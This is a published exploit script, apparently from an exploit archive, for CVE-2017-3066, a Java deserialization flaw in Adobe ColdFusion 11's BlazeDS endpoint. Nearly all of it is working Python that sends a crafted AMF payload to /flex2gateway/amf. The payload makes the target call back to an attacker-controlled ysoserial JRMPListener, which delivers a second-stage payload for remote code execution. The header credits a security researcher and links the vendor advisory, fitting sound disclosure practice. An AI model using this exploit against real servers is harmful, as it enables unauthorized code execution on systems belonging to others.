Adobe Coldfusion 11.0.03.292866 Remote Code Execution

`# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE  
# Date: February 6, 2018  
# Exploit Author: Faisal Tameesh (@DreadSystems)  
# Company: Depth Security (https://depthsecurity.com)  
# Version: Adobe Coldfusion (11.0.03.292866)  
# Tested On: Windows 10 Enterprise (10.0.15063)  
# CVE: CVE-2017-3066  
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html  
# Category: remote  
  
# Notes:  
# This is a two-stage deserialization exploit. The code below is the first stage.  
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.  
# After firing this exploit, and once the target server connects back,   
# JRMPListener will deliver the secondary payload for RCE.  
  
import struct  
import sys  
import requests  
  
if len(sys.argv) != 5:  
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"  
quit()  
  
target_IP = sys.argv[1]  
target_port = sys.argv[2]  
callback_IP = sys.argv[3]  
callback_port = sys.argv[4]  
  
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \  
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \  
struct.pack('>I', int(callback_port)) + \  
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';  
  
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"  
headers = {'Content-Type': 'application/x-amf'}  
response = requests.post(url, headers=headers, data=amf_payload, verify=False)  
  
`